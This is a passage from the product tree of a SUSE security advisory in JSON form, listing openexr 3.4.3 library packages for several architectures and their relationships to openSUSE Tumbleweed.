                "name": "openexr-devel-3.4.3-1.1.aarch64",
                "product": {
                  "name": "openexr-devel-3.4.3-1.1.aarch64",
                  "product_id": "openexr-devel-3.4.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "openexr-doc-3.4.3-1.1.aarch64",
                "product": {
                  "name": "openexr-doc-3.4.3-1.1.aarch64",
                  "product_id": "openexr-doc-3.4.3-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "libIex-3_4-33-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "libIex-3_4-33-3.4.3-1.1.ppc64le",
                  "product_id": "libIex-3_4-33-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libIex-3_4-33-32bit-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "libIex-3_4-33-32bit-3.4.3-1.1.ppc64le",
                  "product_id": "libIex-3_4-33-32bit-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
                  "product_id": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libIlmThread-3_4-33-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "libIlmThread-3_4-33-3.4.3-1.1.ppc64le",
                  "product_id": "libIlmThread-3_4-33-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libIlmThread-3_4-33-32bit-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "libIlmThread-3_4-33-32bit-3.4.3-1.1.ppc64le",
                  "product_id": "libIlmThread-3_4-33-32bit-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
                  "product_id": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXR-3_4-33-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "libOpenEXR-3_4-33-3.4.3-1.1.ppc64le",
                  "product_id": "libOpenEXR-3_4-33-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.ppc64le",
                  "product_id": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
                  "product_id": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRCore-3_4-33-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "libOpenEXRCore-3_4-33-3.4.3-1.1.ppc64le",
                  "product_id": "libOpenEXRCore-3_4-33-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.ppc64le",
                  "product_id": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
                  "product_id": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRUtil-3_4-33-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "libOpenEXRUtil-3_4-33-3.4.3-1.1.ppc64le",
                  "product_id": "libOpenEXRUtil-3_4-33-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.ppc64le",
                  "product_id": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
                  "product_id": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "openexr-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "openexr-3.4.3-1.1.ppc64le",
                  "product_id": "openexr-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "openexr-devel-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "openexr-devel-3.4.3-1.1.ppc64le",
                  "product_id": "openexr-devel-3.4.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "openexr-doc-3.4.3-1.1.ppc64le",
                "product": {
                  "name": "openexr-doc-3.4.3-1.1.ppc64le",
                  "product_id": "openexr-doc-3.4.3-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "libIex-3_4-33-3.4.3-1.1.s390x",
                "product": {
                  "name": "libIex-3_4-33-3.4.3-1.1.s390x",
                  "product_id": "libIex-3_4-33-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libIex-3_4-33-32bit-3.4.3-1.1.s390x",
                "product": {
                  "name": "libIex-3_4-33-32bit-3.4.3-1.1.s390x",
                  "product_id": "libIex-3_4-33-32bit-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
                "product": {
                  "name": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
                  "product_id": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libIlmThread-3_4-33-3.4.3-1.1.s390x",
                "product": {
                  "name": "libIlmThread-3_4-33-3.4.3-1.1.s390x",
                  "product_id": "libIlmThread-3_4-33-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libIlmThread-3_4-33-32bit-3.4.3-1.1.s390x",
                "product": {
                  "name": "libIlmThread-3_4-33-32bit-3.4.3-1.1.s390x",
                  "product_id": "libIlmThread-3_4-33-32bit-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
                "product": {
                  "name": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
                  "product_id": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXR-3_4-33-3.4.3-1.1.s390x",
                "product": {
                  "name": "libOpenEXR-3_4-33-3.4.3-1.1.s390x",
                  "product_id": "libOpenEXR-3_4-33-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.s390x",
                "product": {
                  "name": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.s390x",
                  "product_id": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
                "product": {
                  "name": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
                  "product_id": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRCore-3_4-33-3.4.3-1.1.s390x",
                "product": {
                  "name": "libOpenEXRCore-3_4-33-3.4.3-1.1.s390x",
                  "product_id": "libOpenEXRCore-3_4-33-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.s390x",
                "product": {
                  "name": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.s390x",
                  "product_id": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
                "product": {
                  "name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
                  "product_id": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRUtil-3_4-33-3.4.3-1.1.s390x",
                "product": {
                  "name": "libOpenEXRUtil-3_4-33-3.4.3-1.1.s390x",
                  "product_id": "libOpenEXRUtil-3_4-33-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.s390x",
                "product": {
                  "name": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.s390x",
                  "product_id": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
                "product": {
                  "name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
                  "product_id": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "openexr-3.4.3-1.1.s390x",
                "product": {
                  "name": "openexr-3.4.3-1.1.s390x",
                  "product_id": "openexr-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "openexr-devel-3.4.3-1.1.s390x",
                "product": {
                  "name": "openexr-devel-3.4.3-1.1.s390x",
                  "product_id": "openexr-devel-3.4.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "openexr-doc-3.4.3-1.1.s390x",
                "product": {
                  "name": "openexr-doc-3.4.3-1.1.s390x",
                  "product_id": "openexr-doc-3.4.3-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "libIex-3_4-33-3.4.3-1.1.x86_64",
                "product": {
                  "name": "libIex-3_4-33-3.4.3-1.1.x86_64",
                  "product_id": "libIex-3_4-33-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libIex-3_4-33-32bit-3.4.3-1.1.x86_64",
                "product": {
                  "name": "libIex-3_4-33-32bit-3.4.3-1.1.x86_64",
                  "product_id": "libIex-3_4-33-32bit-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
                "product": {
                  "name": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
                  "product_id": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libIlmThread-3_4-33-3.4.3-1.1.x86_64",
                "product": {
                  "name": "libIlmThread-3_4-33-3.4.3-1.1.x86_64",
                  "product_id": "libIlmThread-3_4-33-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libIlmThread-3_4-33-32bit-3.4.3-1.1.x86_64",
                "product": {
                  "name": "libIlmThread-3_4-33-32bit-3.4.3-1.1.x86_64",
                  "product_id": "libIlmThread-3_4-33-32bit-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
                "product": {
                  "name": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
                  "product_id": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXR-3_4-33-3.4.3-1.1.x86_64",
                "product": {
                  "name": "libOpenEXR-3_4-33-3.4.3-1.1.x86_64",
                  "product_id": "libOpenEXR-3_4-33-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.x86_64",
                "product": {
                  "name": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.x86_64",
                  "product_id": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
                "product": {
                  "name": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
                  "product_id": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRCore-3_4-33-3.4.3-1.1.x86_64",
                "product": {
                  "name": "libOpenEXRCore-3_4-33-3.4.3-1.1.x86_64",
                  "product_id": "libOpenEXRCore-3_4-33-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.x86_64",
                "product": {
                  "name": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.x86_64",
                  "product_id": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
                "product": {
                  "name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
                  "product_id": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRUtil-3_4-33-3.4.3-1.1.x86_64",
                "product": {
                  "name": "libOpenEXRUtil-3_4-33-3.4.3-1.1.x86_64",
                  "product_id": "libOpenEXRUtil-3_4-33-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.x86_64",
                "product": {
                  "name": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.x86_64",
                  "product_id": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
                "product": {
                  "name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
                  "product_id": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "openexr-3.4.3-1.1.x86_64",
                "product": {
                  "name": "openexr-3.4.3-1.1.x86_64",
                  "product_id": "openexr-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "openexr-devel-3.4.3-1.1.x86_64",
                "product": {
                  "name": "openexr-devel-3.4.3-1.1.x86_64",
                  "product_id": "openexr-devel-3.4.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "openexr-doc-3.4.3-1.1.x86_64",
                "product": {
                  "name": "openexr-doc-3.4.3-1.1.x86_64",
                  "product_id": "openexr-doc-3.4.3-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIex-3_4-33-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.aarch64"
        },
        "product_reference": "libIex-3_4-33-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIex-3_4-33-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.ppc64le"
        },
        "product_reference": "libIex-3_4-33-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIex-3_4-33-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.s390x"
        },
        "product_reference": "libIex-3_4-33-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIex-3_4-33-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.x86_64"
        },
        "product_reference": "libIex-3_4-33-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIex-3_4-33-32bit-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.aarch64"
        },
        "product_reference": "libIex-3_4-33-32bit-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIex-3_4-33-32bit-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.ppc64le"
        },
        "product_reference": "libIex-3_4-33-32bit-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIex-3_4-33-32bit-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.s390x"
        },
        "product_reference": "libIex-3_4-33-32bit-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIex-3_4-33-32bit-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.x86_64"
        },
        "product_reference": "libIex-3_4-33-32bit-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.aarch64"
        },
        "product_reference": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le"
        },
        "product_reference": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.s390x"
        },
        "product_reference": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.x86_64"
        },
        "product_reference": "libIex-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIlmThread-3_4-33-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.aarch64"
        },
        "product_reference": "libIlmThread-3_4-33-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIlmThread-3_4-33-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.ppc64le"
        },
        "product_reference": "libIlmThread-3_4-33-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIlmThread-3_4-33-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.s390x"
        },
        "product_reference": "libIlmThread-3_4-33-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIlmThread-3_4-33-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.x86_64"
        },
        "product_reference": "libIlmThread-3_4-33-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIlmThread-3_4-33-32bit-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.aarch64"
        },
        "product_reference": "libIlmThread-3_4-33-32bit-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIlmThread-3_4-33-32bit-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.ppc64le"
        },
        "product_reference": "libIlmThread-3_4-33-32bit-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIlmThread-3_4-33-32bit-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.s390x"
        },
        "product_reference": "libIlmThread-3_4-33-32bit-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIlmThread-3_4-33-32bit-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.x86_64"
        },
        "product_reference": "libIlmThread-3_4-33-32bit-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.aarch64"
        },
        "product_reference": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le"
        },
        "product_reference": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.s390x"
        },
        "product_reference": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.x86_64"
        },
        "product_reference": "libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXR-3_4-33-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.aarch64"
        },
        "product_reference": "libOpenEXR-3_4-33-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXR-3_4-33-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.ppc64le"
        },
        "product_reference": "libOpenEXR-3_4-33-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXR-3_4-33-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.s390x"
        },
        "product_reference": "libOpenEXR-3_4-33-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXR-3_4-33-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.x86_64"
        },
        "product_reference": "libOpenEXR-3_4-33-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.aarch64"
        },
        "product_reference": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.ppc64le"
        },
        "product_reference": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.s390x"
        },
        "product_reference": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.x86_64"
        },
        "product_reference": "libOpenEXR-3_4-33-32bit-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.aarch64"
        },
        "product_reference": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le"
        },
        "product_reference": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
